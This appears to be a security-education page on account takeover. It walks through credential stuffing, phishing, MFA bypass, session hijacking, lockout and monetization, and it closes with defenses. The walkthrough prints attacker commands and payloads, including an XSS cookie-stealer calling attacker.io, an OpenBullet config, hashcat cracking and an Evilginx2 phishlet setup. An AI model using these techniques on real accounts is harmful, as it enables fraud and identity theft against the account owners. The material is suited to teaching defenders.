ATT&CK T1078 / T1110 - Credential Access & Initial Access

ACCOUNT TAKEOVER Unauthorized Control via Credential Compromise

Account Takeover (ATO) is the unauthorized seizure of user accounts through stolen credentials, session hijacking, phishing, or authentication bypass - enabling attackers to operate as the victim inside trusted systems.

HIGH VOLUME - BILLIONS OF CREDENTIALS IN CIRCULATION
Annual Losses
$17B+
Estimated global ATO fraud losses annually across financial, e-commerce, and enterprise sectors
Credential Pairs Available
24B+
Username/password pairs available on dark web markets and breach dump repositories
Credential Stuffing Success
0.5–2%
Typical success rate - against millions of credentials this yields thousands of compromised accounts
Password Reuse Rate
65%
Users reuse passwords across multiple sites, directly fueling credential stuffing attacks
01

ATO ATTACK VECTORS

🗂️
Credential Stuffing
MOST COMMON - AUTOMATED
Automated replay of breached username/password pairs from dark web dumps across thousands of sites simultaneously. Exploits password reuse - no hacking required, just automation.
🎣
Phishing / Spear Phishing
TARGETED - HIGH CONVERSION
Fraudulent emails, login pages, or SMS messages that trick users into entering credentials into attacker-controlled sites. Spear phishing targets specific individuals with personalized lures.
🔨
Brute Force / Password Spray
OPPORTUNISTIC - NOISY
Brute force tries all password combinations. Password spraying tries one common password (e.g., "Summer2024!") against thousands of accounts to avoid lockout thresholds.
🍪
Session Hijacking
POST-AUTH - STEALTHY
Stealing authenticated session cookies via XSS, MITM, or network sniffing. The attacker replays the session token and gains access without ever knowing the password.
📱
MFA Bypass / SIM Swapping
ADVANCED - SOCIAL ENGINEERING
SIM swap: social-engineer a carrier to transfer victim's phone number. MFA fatigue: spam push notifications until user approves. Real-time phishing proxies intercept OTP codes.
🧬
OAuth / SSO Abuse
MODERN - CHAIN ATTACKS
Exploit misconfigured OAuth flows, consent phishing ("malicious app requests"), or redirect URI vulnerabilities to steal authorization tokens granting access to linked accounts.
02

CREDENTIAL STUFFING - HOW IT WORKS

The Stuffing Pipeline
A single breach fuels thousands of account takeovers across the web through automation and password reuse.
1
Breach Database Acquired
Attacker purchases dump from dark web (e.g., 200M LinkedIn, 730M COMB). File contains email:password pairs in plaintext or easily cracked hashes.
2
Credential List Cleaned & Deduped
Parse, deduplicate, and filter credentials. Prioritize high-value domains (banking, email). Convert hashed passwords using rainbow tables or prior cracking.
3
Automated Stuffing Tool Deployed
Tools like Sentry MBA, STORM, OpenBullet load target site configs. Distributed through rotating residential proxies and headless browsers to evade IP-based rate limiting.
4
Successful Logins Harvested
Hits are automatically captured - account balance, linked payment methods, stored PII, and access to connected services (OAuth-linked accounts).
5
Account Monetized or Sold
Compromised accounts sold in bulk, used for fraud, or leveraged for further attacks. Bank accounts drained, loyalty points liquidated, SaaS accounts used for spam.

LIVE STUFFING SIMULATION - RESULTS FEED

TESTED: 0
HITS: 0
RATE: 0%

KEY INSIGHT

At scale: 0.5% success rate × 100M credentials = 500,000 compromised accounts from a single campaign.

03

ATTACK FLOW DIAGRAM

💾 BREACH DUMP Dark Web Market ACQUIRE 📋 CRED LIST email:pass pairs AUTOMATE ⚙️ STUFFING ENGINE Proxies + Bots Distributed / Headless ATTEMPT 🔐 TARGET LOGIN Bank / SaaS / Email SUCCESS RETRY NEXT PAIR 💀 ACCOUNT OWNED Session Hijacked Creds Changed 💰 MONETIZE ① SOURCE ② ACQUIRE ③ AUTOMATE ④ ATTACK ⑤ TAKEOVER ⑥ EXPLOIT
04

STEP-BY-STEP WALKTHROUGH

Phase 01 - Credential Acquisition

SOURCING STOLEN CREDENTIALS

🛒
ATTACKER STATUS
PREPARATION PHASE

Before any attack, the threat actor assembles their ammunition: massive lists of breached credentials harvested from dark web markets, paste sites, and prior breach databases. No hacking skill required at this stage.

  • Purchase breach combo lists from Telegram channels, dark web forums (BreachForums, RaidForums)
  • COMB (Collection of Many Breaches): 3.2B unique pairs aggregated from prior breaches
  • Credential cracking: MD5/SHA1 hashes cracked using Hashcat + RockYou wordlists
  • Scrape LinkedIn, HaveIBeenPwned, DeHashed for account enumeration
  • Clean and parse: remove duplicates, filter by target domain (e.g. @company.com)
attacker - credential prep
# Parse & filter breach combo list
$ wc -l comb_2024.txt
3,218,442,970 comb_2024.txt
 
$ grep "@targetbank.com" comb_2024.txt > bank_creds.txt
Found: 48,291 matching credentials
 
$ hashcat -m 0 hashes.txt rockyou.txt --show
Recovered: 31,847/48,291 (65.9%)
 
$ sort -u bank_creds.txt | wc -l
28,103 unique credential pairs ready
Phase 02 - Automated Attack Deployment

DEPLOYING THE STUFFING BOT

🤖
ATTACK SCALE
THOUSANDS OF ATTEMPTS / MINUTE

Credential stuffing tools automate login attempts at machine speed across thousands of distributed IP addresses, impersonating real browsers to evade bot detection systems and WAFs.

  • OpenBullet / SilverBullet - open-source stuffing framework with site-specific configs
  • Residential proxy networks (10M+ IPs) make each attempt appear from a real user location
  • CAPTCHA-solving services (2captcha, Anti-Captcha) automatically bypass CAPTCHA challenges
  • Browser fingerprint spoofing: rotate User-Agent, TLS fingerprint, and screen resolution
  • Rate limiting evasion: slow-and-low mode (1 attempt/IP/hour) defeats most defenses
openbullet - credential stuffing config
# OpenBullet config for target site
BLOCK:REQUEST
URL = "https://targetbank.com/login"
POST username=<USER>&password=<PASS>
 
BLOCK:KEYCHECK
SUCCESS → "Welcome back, " (200)
FAILURE → "Invalid credentials" (401)
 
$ proxies: 14,892 residential IPs loaded
[*] Starting campaign...
[+] HIT: user@targetbank.com:Dallas1987
Phase 03 - Social Engineering Vector

PHISHING ATTACK

🎣
TARGET STATUS
VICTIM UNAWARE - CREDENTIALS INTERCEPTED

Phishing creates convincing fake login pages that capture credentials in real time. Modern adversary-in-the-middle (AiTM) phishing proxies even intercept MFA tokens, defeating two-factor authentication entirely.

  • Evilginx2 / Modlishka - reverse proxy AiTM that captures both password AND session cookie
  • Email lures: "Your account has been locked - verify immediately" drives urgency
  • Domain squatting: login-microsoft.com, paypa1.com, security-bankofamerica.net
  • Spear phishing uses victim's name, employer, and recent activity for personalized lures
  • Captured session cookie grants access even if victim has MFA enabled
evilginx2 - AiTM phishing proxy
: phishlets hostname o365 login-microsoft-secure.com
: phishlets enable o365
[+] Phishlet 'o365' enabled - proxying live
 
# Victim clicks link, enters real M365 creds
[17:42:11] Username: victim@company.com
[17:42:14] Password: Autumn2024!
# Victim completes MFA push on real phone
[17:42:19] SESSION COOKIE CAPTURED ✓
[!] Account fully compromised - MFA bypassed
Phase 04 - Authentication Bypass

MFA BYPASS & SIM SWAP

📱
DEFENSIVE LAYER
MFA DEFEATED

MFA is not impenetrable. Attackers use SIM swapping, MFA fatigue attacks, and real-time OTP interception to defeat two-factor authentication - the last major barrier between credentials and account access.

  • SIM Swap - social engineer carrier to port victim's number to attacker's SIM. All SMS OTPs now go to attacker
  • MFA Fatigue - spam 50+ push notifications until frustrated user approves one
  • Real-time relay - phishing site proxies OTP to real site within seconds before expiry
  • SS7 protocol attacks intercept SMS at the carrier level (nation-state capability)
  • Attacker registers their own authenticator app via account recovery flows
MFA fatigue attack - push spam
# Attacker has valid password - MFA blocks login
# Begin push notification flood
 
[09:11] MFA push sent → victim phone
[09:11] Response: DENIED
[09:13] MFA push sent → victim phone
[09:13] Response: DENIED
[09:17] MFA push sent → victim phone
[09:17] Response: DENIED
[09:22] MFA push sent → victim phone
[09:22] Response: APPROVED ← victim fatigue
[!] MFA bypassed - account accessed
Phase 05 - Session Hijacking

SESSION COOKIE THEFT

🍪
SESSION STATE
SESSION HIJACKED

Once credentials are verified, the attacker steals the authenticated session cookie - a token that proves the user has already logged in. This token can be replayed from any device or location.

  • XSS injection on trusted site executes attacker-controlled script, exfiltrating document.cookie
  • MITM attack on public WiFi captures unencrypted session tokens in transit
  • Malware (infostealer) harvests all browser session cookies from victim's device
  • Browser extension compromise silently forwards all cookies to attacker's server
  • Session fixation: attacker pre-sets the session ID before victim authenticates
attacker - session theft via XSS
# XSS payload injecting cookie stealer
<script>
fetch("https://attacker.io/steal?c="
+ document.cookie)
</script>
 
# Received on attacker server
session_id=abc123xyz789; auth_token=eyJh...
 
# Replay stolen cookie
curl -H "Cookie: session_id=abc123xyz789"
https://targetsite.com/account/profile
200 OK - Logged in as victim@email.com
Phase 06 - Account Lockout

LOCKING OUT THE VICTIM

🔒
VICTIM STATUS
LOCKED OUT OF OWN ACCOUNT

To prevent the victim from regaining control, the attacker immediately changes the account password, email address, phone number, and recovery options - permanently locking out the legitimate owner.

  • Change account password immediately after gaining access
  • Update recovery email to attacker-controlled address
  • Change phone number to attacker's SIM to intercept all future OTPs
  • Revoke all existing sessions to prevent victim from reclaiming account
  • Enable additional MFA under attacker's control to prevent recovery
attacker - account lockout sequence
# Change password immediately
POST /account/change-password
{"new_password":"Attacker@9999!"}
Password updated ✓
 
POST /account/update-email
{"email":"attacker@proton.me"}
Recovery email updated ✓
 
[!] Victim now locked out permanently
[!] All recovery paths controlled by attacker
Phase 07 - Monetization

EXPLOITATION & CASH OUT

💰
ATTACKER PROFIT
MONETIZATION IN PROGRESS

With full account control, attackers pursue maximum financial and strategic value: draining funds, harvesting stored payment data, using the account as an attack platform, or selling it to other criminals.

  • Financial fraud - initiate wire transfers, drain balances, max out linked cards
  • Identity theft - use PII to open credit cards, apply for loans, file fraudulent tax returns
  • Account resale - sell verified accounts on dark web (bank accounts: $50–$500 per account)
  • Email/cloud access leveraged for BEC (Business Email Compromise) fraud
  • Chain to other accounts via password reset emails, OAuth-linked services
post-takeover - monetization
# Banking ATO - financial fraud
POST /transfers/initiate
{"to":"attacker_mule","amount":9800}
Transfer queued: $9,800.00 ✓
 
# Extract stored PII + payment cards
Name: John Michael Smith
Card: **** **** **** 4823 CVV:391
 
# List on dark web market
targetbank.com FULLZ - $320 BTC
Includes: balance $47k, cards, SSN ✓
STEP 1 OF 7
05

ATO IMPACT MATRIX

🏦
Financial Fraud
Direct theft via unauthorized wire transfers, ACH fraud, credit card abuse, and cryptocurrency wallets. Funds moved through mule accounts become nearly unrecoverable within hours.
👤
Identity Theft
PII extracted from compromised accounts enables fraudulent credit applications, tax return fraud, synthetic identity creation, and long-term identity impersonation that takes years to resolve.
📧
Business Email Compromise (BEC)
Corporate email account takeover enables CEO fraud, fake invoice attacks, and supply chain compromise. FBI reports BEC losses exceed $2.9B annually - largest cybercrime loss category.
🔗
Account Chaining
One compromised account cascades to others via password resets, OAuth-linked apps, and SSO. A single email takeover can unlock banking, social media, cloud storage, and e-commerce simultaneously.
🏢
Enterprise Lateral Movement
Corporate account takeover provides an authenticated foothold inside the target organization - bypassing perimeter controls. Enables internal spear phishing, data exfiltration, and ransomware deployment.
📉
Reputational & Regulatory Damage
Mass ATO events trigger mandatory breach disclosures, regulatory fines (GDPR, CCPA), customer churn, and media coverage. The average ATO-related data breach costs $4.45M (IBM Cost of a Data Breach 2023).
06

DEFENSIVE COUNTERMEASURES

🔑
Phishing-Resistant MFA
Replace SMS OTP with FIDO2/WebAuthn hardware keys (YubiKey) or passkeys. Bound to the legitimate domain - phishing sites cannot intercept. Defeats AiTM proxies entirely.
🤖
Bot Detection & WAF
Deploy behavioral analysis tools (Cloudflare Bot Management, Akamai Bot Manager, DataDome) to detect credential stuffing patterns: velocity, TLS fingerprints, JS challenge failures, and device anomalies.
🚨
Breached Password Detection
Integrate HaveIBeenPwned API or similar to check passwords against known breach databases at login and registration. Force password resets for accounts using known-compromised credentials.
📊
Risk-Based Authentication
Step-up authentication based on contextual risk signals: new device, impossible travel, unusual IP geolocation, abnormal transaction size. High-risk logins trigger additional verification challenges.
🔔
Real-Time Login Alerting
Notify users via out-of-band channel (secondary email, push) of every login, especially from new devices or locations. Immediate alerts enable rapid response before attacker locks out victim.
⏱️
Session Token Hygiene
Short session expiry, Secure + HttpOnly + SameSite=Strict cookie flags, token binding to device fingerprint. Stolen session tokens should expire quickly and be unusable from different contexts.
🗝️
Passkeys (FIDO2)
Passkeys replace passwords entirely with device-bound cryptographic credentials. No shared secret to steal or stuff. Completely immune to phishing, credential stuffing, and brute force attacks.
🛡️
Account Recovery Hardening
Require identity verification for recovery contact changes. Add time delays (24–48hr) before recovery email/phone changes take effect. Send verification to old contact before allowing changes.
👁️
Threat Intelligence Feeds
Subscribe to ATO-specific threat intel feeds monitoring dark web markets for your domain's credentials. Proactively reset accounts before attackers can use them. Services: SpyCloud, DarkOwl, Constella.